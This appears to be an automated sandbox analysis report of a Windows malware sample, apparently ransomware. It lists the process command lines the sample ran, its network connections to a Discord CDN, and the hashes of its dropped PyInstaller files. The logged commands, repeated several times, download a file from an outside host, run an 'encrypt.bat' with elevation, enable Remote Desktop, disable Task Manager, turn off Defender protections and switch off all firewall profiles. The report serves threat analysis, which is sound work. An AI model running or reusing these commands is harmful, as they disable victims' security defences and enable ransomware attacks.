C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 101.242.123.52.in-addr.arpa udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI11002\python312.dll

MD5 3c388ce47c0d9117d2a50b3fa5ac981d
SHA1 038484ff7460d03d1d36c23f0de4874cbaea2c48
SHA256 c98ba3354a7d1f69bdca42560feec933ccba93afcc707391049a065e1079cddb
SHA512 e529c5c1c028be01e44a156cd0e7cad0a24b5f91e5d34697fafc395b63e37780dc0fac8f4c5d075ad8fe4bd15d62a250b818ff3d4ead1e281530a4c7e3ce6d35

C:\Users\Admin\AppData\Local\Temp\_MEI11002\VCRUNTIME140.dll

MD5 be8dbe2dc77ebe7f88f910c61aec691a
SHA1 a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA256 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA512 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

C:\Users\Admin\AppData\Local\Temp\_MEI11002\_ctypes.pyd

MD5 bbd5533fc875a4a075097a7c6aba865e
SHA1 ab91e62c6d02d211a1c0683cb6c5b0bdd17cbf00
SHA256 be9828a877e412b48d75addc4553d2d2a60ae762a3551f9731b50cae7d65b570
SHA512 23ef351941f459dee7ed2cebbae21969e97b61c0d877cfe15e401c36369d2a2491ca886be789b1a0c5066d6a8835fd06db28b5b28fb6e9df84c2d0b0d8e9850e

C:\Users\Admin\AppData\Local\Temp\_MEI11002\python3.DLL

MD5 79b02450d6ca4852165036c8d4eaed1f
SHA1 ce9ff1b302426d4c94a2d3ea81531d3cb9e583e4
SHA256 d2e348e615a5d3b08b0bac29b91f79b32f0c1d0be48976450042462466b51123
SHA512 47044d18db3a4dd58a93b43034f4fafa66821d157dcfefb85fca2122795f4591dc69a82eb2e0ebd9183075184368850e4caf9c9fea0cfe6f766c73a60ffdf416

C:\Users\Admin\AppData\Local\Temp\_MEI11002\base_library.zip

MD5 08332a62eb782d03b959ba64013ac5bc
SHA1 b70b6ae91f1bded398ca3f62e883ae75e9966041
SHA256 8584f0eb44456a275e3bc69626e3acad595546fd78de21a946b2eb7d6ba02288
SHA512 a58e4a096d3ce738f6f93477c9a73ddbfcb4b82d212c0a19c0cf9e07f1e62b2f477a5dd468cd31cc5a13a73b93fa17f64d6b516afef2c56d38ede1ace35cf087

C:\Users\Admin\AppData\Local\Temp\_MEI11002\libffi-8.dll

MD5 0f8e4992ca92baaf54cc0b43aaccce21
SHA1 c7300975df267b1d6adcbac0ac93fd7b1ab49bd2
SHA256 eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a
SHA512 6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

C:\Users\Admin\AppData\Local\Temp\_MEI11002\_socket.pyd

MD5 dc06f8d5508be059eae9e29d5ba7e9ec
SHA1 d666c88979075d3b0c6fd3be7c595e83e0cb4e82
SHA256 7daff6aa3851a913ed97995702a5dfb8a27cb7cf00fb496597be777228d7564a
SHA512 57eb36bc1e9be20c85c34b0a535b2349cb13405d60e752016e23603c4648939f1150e4dbebc01ec7b43eb1a6947c182ccb8a806e7e72167ad2e9d98d1fd94ab3

C:\Users\Admin\AppData\Local\Temp\_MEI11002\cryptography\hazmat\bindings\_rust.pyd

MD5 61d63fbd7dd1871392997dd3cef6cc8e
SHA1 45a0a7f26f51ce77aa1d89f8bedb4af90e755fa9
SHA256 ae3a2936b138a2faa4d0cd6445fae97e441b23f6fdafb1a30e60fd80c37d7df5
SHA512 c31f1f281d354acb424a510d54790ee809364b55425b1d39429e1bb7c379126578260c6f197834339a34833c90e748483aabd426295731f78fcde9580fcd8f9f

C:\Users\Admin\AppData\Local\Temp\_MEI11002\_lzma.pyd

MD5 05e8b2c429aff98b3ae6adc842fb56a3
SHA1 834ddbced68db4fe17c283ab63b2faa2e4163824
SHA256 a6e2a5bb7a33ad9054f178786a031a46ea560faeef1fb96259331500aae9154c
SHA512 badeb99795b89bc7c1f0c36becc7a0b2ce99ecfd6f6bb493bda24b8e57e6712e23f4c509c96a28bc05200910beddc9f1536416bbc922331cae698e813cbb50b3

C:\Users\Admin\AppData\Local\Temp\_MEI11002\_hashlib.pyd

MD5 eedb6d834d96a3dffffb1f65b5f7e5be
SHA1 ed6735cfdd0d1ec21c7568a9923eb377e54b308d
SHA256 79c4cde23397b9a35b54a3c2298b3c7a844454f4387cb0693f15e4facd227dd2
SHA512 527bd7bb2f4031416762595f4ce24cbc6254a50eaf2cc160b930950c4f2b3f5e245a486972148c535f8cd80c78ec6fa8c9a062085d60db8f23d4b21e8ae4c0ad

C:\Users\Admin\AppData\Local\Temp\_MEI11002\_decimal.pyd

MD5 3055edf761508190b576e9bf904003aa
SHA1 f0dc8d882b5cd7955cc6dfc8f9834f70a83c7890
SHA256 e4104e47399d3f635a14d649f61250e9fd37f7e65c81ffe11f099923f8532577
SHA512 87538fe20bd2c1150a8fefd0478ffd32e2a9c59d22290464bf5dfb917f6ac7ec874f8b1c70d643a4dc3dd32cbe17e7ea40c0be3ea9dd07039d94ab316f752248

